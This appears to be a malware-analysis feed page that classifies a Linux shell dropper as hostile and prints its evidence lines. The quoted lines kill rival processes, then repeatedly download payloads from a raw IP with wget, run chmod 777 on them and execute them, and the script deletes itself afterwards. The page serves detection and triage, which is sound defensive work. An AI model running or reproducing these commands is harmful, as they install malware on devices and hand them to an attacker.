Hostile 100% linux Download

p

Dropper downloads and executes raw IP payloads

Raw-IP wget world-writable fetch executeRepeated raw-IP payload download chmod execution
SHA-256c851ecd062b1cc9db81dcff434973c2fb577ae732cba966aa469744c2d074c31

Evidence

Raw IP bulk download chmod execute lines 12–22
12:40… ot"*|*"dvrLocker"*|*"acd"*|*"dvrHelper"*|*".c.pid"*)
13 kill -9 "$pid"
14 ;;
15 esac
16done
17cd /tmp; rm -rf rOY; wget http://129.121.114.124/rOY; chmod 777 rOY; ./rOY pdvr;
18cd /tmp; rm -rf Yu9; wget http://129.121.114.124/Yu9; chmod 777 Yu9; ./Yu9 pdvr;
19cd /tmp; rm -rf oI5j; wget http://129.121.114.124/oI5j; chmod 777 oI5j; ./oI5j pdvr;
20cd /tmp; rm -rf RKY; wget http://129.121.114.124/RKY; chmod 777 RKY; ./RKY pdvr;
21cd /tmp; rm -rf fUE0; wget http://129.121.114.124/fUE0; chmod 777 fUE0; ./fUE0 pdvr;
22echo "" > p; rm -rf p;

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.